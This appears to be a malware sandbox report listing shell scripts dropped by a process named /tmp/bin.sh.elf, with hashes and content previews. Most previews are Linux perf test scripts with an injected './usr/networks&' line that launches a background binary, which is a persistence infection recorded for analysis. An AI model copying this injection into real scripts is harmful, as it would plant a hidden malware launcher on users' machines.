                                                                        SHA-512:7220C673402F83D27E29DBFAD6488DB76DF2A4DAFE8136D5065482D36DECE6829D7E6438D53D358CAF757C861638D5106AEBF36C5D4ACB550CF99DD135E0A76D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.test -d ../../include || exit 0..cd ../....# simple diff check.for i in $FILES; do. check $i -B.done..# diff with extra ignore lines.check arch/x86/lib/memcpy_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check arch/x86/lib/memset_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check include/uapi/asm-generic/mman.h '-I "^#include <\(uapi/\)*asm-generic/mman-common\(-tools\)*.h>"'.check include/uapi/linux/mman.h '-I "^#include <\(uapi/\)*asm/mman.h>"'.check include/linux/ctype.h. '-I "isdigit("'.check lib/ctype.c.. '-I "^EXPORT_SYMBOL" -I "^#include <linux/export.h>" -B'.check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c. '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c. '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'..# diff
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):655
                                                                        Entropy (8bit):5.557065419733984
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6v5HKxhrYyZPjytOsMyVzr1oerr5bYlb3i/mnhjK4n:raBZOtOHyVylxng4
                                                                        MD5:5F6BDB1DD164C0B1412F1A48A21991B9
                                                                        SHA1:B5D3E44D0B2A794496C77D28B03FFD198F579967
                                                                        SHA-256:A144625B54FE5F40D5BA5E1FBBD12B7469FE7A93146A7E717C37129B1A6E1D65
                                                                        SHA-512:5CED1E7056789E773B2C72845EADB8E81E4EF6A0C8CDA51159006296B2948F71EA75B0EAFF54DA6C6AFBD62F88D86B03181B9CBE207BAE9175ACAAAC8EA02187
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..MANIFEST=$(mktemp /tmp/perf-archive-manifest.XXXXXX).PERF_BUILDID_LINKDIR=$(readlink -f $PERF_BUILDID_DIR)/..cut -d ' ' -f 1 $BUILDIDS | \.while read build_id ; do..linkname=$PERF_BUILDID_DIR.build-id/${build_id:0:2}/${build_id:2}..filename=$(readlink -f $linkname)..echo ${linkname#$PERF_BUILDID_DIR} >> $MANIFEST..echo ${filename#$PERF_BUILDID_LINKDIR} >> $MANIFEST.done..tar cjf $PERF_DATA.tar.bz2 -C $PERF_BUILDID_DIR -T $MANIFEST.rm $MANIFEST $BUILDIDS || true.echo -e "Now please run:\n".echo -e "$ tar xvf $PERF_DATA.tar.bz2 -C ~/.debug\n".echo "wherever you need to run 'perf report' on.".exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5976
                                                                        Entropy (8bit):5.501326007067708
                                                                        Encrypted:false
                                                                        SSDEEP:48:JsPA4w4mkW3+0yQXHuwCBA6RfAqN62YYwYSA+B5Af8ufUF+lmfUEVZOQXo0FNn5G:uPeJ+0yQXH3zGfYH+AYkW/k/7hQkQmc
                                                                        MD5:2367A910716F3184670C4A30214231F9
                                                                        SHA1:706F95FE61D127EB29A4B4A78EDA595D20DE7963
                                                                        SHA-256:742B8C3C32E4B47BD88CB39C22DAD76D6C24BBA566EBA18C6D98A7D73381EB28
                                                                        SHA-512:F942F9A19F485774E7E115C21E2372C1ABF433690A4C68F0BE96109C3C3338D2924DD60C8D8B2B06632C855CB405CF8D4DF37CCC4E6F4C41C92F72C894A49FFB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.}..find_perf().{..if [ -n "$PERF" ] ; then...return..fi..PERF=`which perf || true`..if [ -z "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..if [ ! -x "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..echo "Using $PERF".."$PERF" version.}..copy_kcore().{..echo "Copying kcore"...if [ $EUID -eq 0 ] ; then...SUDO=""..else...SUDO="sudo"..fi...rm -f perf.data.junk..("$PERF" record -o perf.data.junk "${PERF_OPTIONS[@]}" -- sleep 60) >/dev/null 2>/dev/null &..PERF_PID=$!...# Need to make sure that perf has started..sleep 1...KCORE=$(($SUDO "$PERF" buildid-cache -v -f -k /proc/kcore >/dev/null) 2>&1)..case "$KCORE" in.."kcore added to build-id cache directory "*)...KCORE_DIR=${KCORE#"kcore added to build-id cache directory "}..;;..*)...kill $PERF_PID...wait >/dev/null 2>/dev/null || true...rm perf.data.junk...echo "$KCORE"...echo "Failed to find kcore" >&2...exit 1..;;..esac...kill $PERF_PID..wait >/dev/null 2>/dev/null
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):203
                                                                        Entropy (8bit):4.726134994025493
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVYUg/yz6dQtvJ2qVB4UXpWLa7UXnUQg7KIBPfAX7UXDj2HvqlOORgn:Lyy9uSUXx7UX6ZBPfi7UXmPTn
                                                                        MD5:2B25349D8ED8573F5E23C69B731A0628
                                                                        SHA1:9347DECB096013BAE8C703472CF2812009064955
                                                                        SHA-256:9AF038A6F3B205CDB6DEA138218E5C79B6A68FBB6A76F65C8CE1AB47FDA0241C
                                                                        SHA-512:5A5B6BB51FDE49F8EDBFED2AE70E921BE04F72DF64E1085927A1CCEFA3478A075B85F0AA7776D38AB27A760AD2F624F7B70DB5D53262AED83379F48929732321
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2564
                                                                        Entropy (8bit):5.249114774902953
                                                                        Encrypted:false
                                                                        SSDEEP:48:k5wfEdvLzMPrlxQvB4y4d4mBO7JN4d4mhu4d4md4d6sd4dm4dL4kkF4dL4kfSCCa:kmfwMPrTxrd2FqdPdEdudPdMkbdMk6C/
                                                                        MD5:183413018EA35B00671B5740CF8258E7
                                                                        SHA1:87F1954CEE6DE1E05B0E2693F547631FFB22C5C7
                                                                        SHA-256:ABB6A1A5F3CA30C3E5896B29E4C4D57CC5E7DC1C01FA160CF090A1330E70D5AF
                                                                        SHA-512:0E61B9CB1D1D586CC1815DEB03EC9DEEAC8334A37F4CC9C16EA6E78544FDAC8BFDC65C8396900A67F1D8F2743D351FE36B4B7FE49B9FC5D4758A06D70A14775A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.nm -Dg $libc 2>/dev/null | fgrep -q inet_pton || exit 254..event_pattern='probe_libc:inet_pton(\_[[:digit:]]+)?'..add_libc_inet_pton_event() {...event_name=$(perf probe -f -x $libc -a inet_pton 2>&1 | tail -n +2 | head -n -5 | \....grep -P -o "$event_pattern(?=[[:space:]]\(on inet_pton in $libc\))")...if [ $? -ne 0 -o -z "$event_name" ] ; then...printf "FAIL: could not add event\n"...return 1..fi.}..trace_libc_inet_pton_backtrace() {...expected=`mktemp -u /tmp/expected.XXX`...echo "ping[][0-9 \.:]+$event_name: \([[:xdigit:]]+\)" > $expected..echo ".*inet_pton\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected..case "$(uname -m)" in..s390x)...eventattr='call-graph=dwarf,max-stack=4'...echo "gaih_inet.*\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "(__GI_)?getaddrinfo\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "main\+0x[[:xdigit:]]+[[:space:]]\(.*/bin/ping.*\)$" >> $expected...;;..ppc64|ppc64le)...eventattr='max-stack
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):791
                                                                        Entropy (8bit):5.063685234698662
                                                                        Encrypted:false
                                                                        SSDEEP:24:dgag2s0vRocEeuc5nf4OIypA4KdAqhzAytRozqC:dd33vycJ4pMA4KtftgX
                                                                        MD5:126EA193A782B859133B7D175B89C795
                                                                        SHA1:EA89D10F53E9DF9685D03131034C301E11D78617
                                                                        SHA-256:32159BD7A2F4959C901796F6FE54CDBB7BDEA02FE819FC7887F0D29EA4243DD2
                                                                        SHA-512:799E9C2778F6C305446356002EC17B4E2F13A41D81F10680A86C30D02F81675CD6F331916AC56C376C9AAFFEB7FC0904D7FDABAD4DF0A682BC6BA1020920410E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..perfdata=$(mktemp /tmp/__perf_test.perf.data.XXXXX).file=$(mktemp /tmp/temporary_file.XXXXX)..record_open_file() {..echo "Recording open file:"..perf record -o ${perfdata} -e probe:vfs_getname touch $file.}..perf_script_filenames() {..echo "Looking at perf.data file for vfs_getname records for the file we touched:"..perf script -i ${perfdata} | \..egrep " +touch +[0-9]+ +\[[0-9]+\] +[0-9]+\.[0-9]+: +probe:vfs_getname: +\([[:xdigit:]]+\) +pathname=\"${file}\"".}..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..record_open_file && perf_script_filenames.err=$?.rm -f ${perfdata}.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):175
                                                                        Entropy (8bit):4.56987105178125
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVYUgL2RjZFtvGSp1QGKR5D8NA7VDiCfx7VD4EyXDlRXYvZOj2HvqlOORgn:cjZrpCr5D8NARDP5RD4EyX3sZ7PTn
                                                                        MD5:C18BE941AC8872252385A118389DBE1F
                                                                        SHA1:EF0F9A60B8E3BDCD9D135BEBC6E6FB0B40C1DC56
                                                                        SHA-256:84C02426161EEC74AED2847DA06C62CD8EA87DCF6ECCE2FAD0C919242F168AAD
                                                                        SHA-512:DCFF993D3B448E3E1AECAD9A38B7853FD6C78C69D1B216CBE3F2E383C66A74C71D878EA71C503DDCB620829FD794B16FECF80FD1C77E6D56B3CE3EC675CF7C55
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.skip_if_no_z_record || exit 2.collect_z_record && check_compressed_stats && check_compressed_output.err=$?.rm -f $trace_file*.exit $err../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):903
                                                                        Entropy (8bit):5.457774373928952
                                                                        Encrypted:false
                                                                        SSDEEP:24:GgZK+BJ4tKIgz4zA6AqhzD3OQYcR+r4oC:G80t2aAq5eQvR+M
                                                                        MD5:F67D88D746E8684039F80038F291B901
                                                                        SHA1:3FB52B248C2B563875C193D50FF579B01E881850
                                                                        SHA-256:335A6AB099307E5702CC4592F17C0FBED43CC1078E84C0FE5DD75A571E5D0962
                                                                        SHA-512:9941B3E08190D1C6BE060A81B45311D149586265083FB5D5FBB2E397CD3B6B0E81CFD42139B923F3777AD1CBDC9AE7046B8DA25DFC97DFFA58F18BB64AA61285
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.skip_if_no_perf_probe || exit 2.skip_if_no_perf_trace || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..file=$(mktemp /tmp/temporary_file.XXXXX)..trace_open_vfs_getname() {..evts=$(echo $(perf list syscalls:sys_enter_open* 2>&1 | egrep 'open(at)? ' | sed -r 's/.*sys_enter_([a-z]+) +\[.*$/\1/') | sed 's/ /,/')..perf trace -e $evts touch $file 2>&1 | \..egrep " +[0-9]+\.[0-9]+ +\( +[0-9]+\.[0-9]+ ms\): +touch\/[0-9]+ open(at)?\((dfd: +CWD, +)?filename: +${file}, +flags: CREAT\|NOCTTY\|NONBLOCK\|WRONLY, +mode: +IRUGO\|IWUGO\) += +[0-9]+$".}...add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..# Do not use whatever ~/.perfconfig file, it may change the output.# via trace.{show_timestamp,show_prefix,etc}.export PERF_CONFIG=/dev/null..trace_open_vfs_getname.err=$?.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
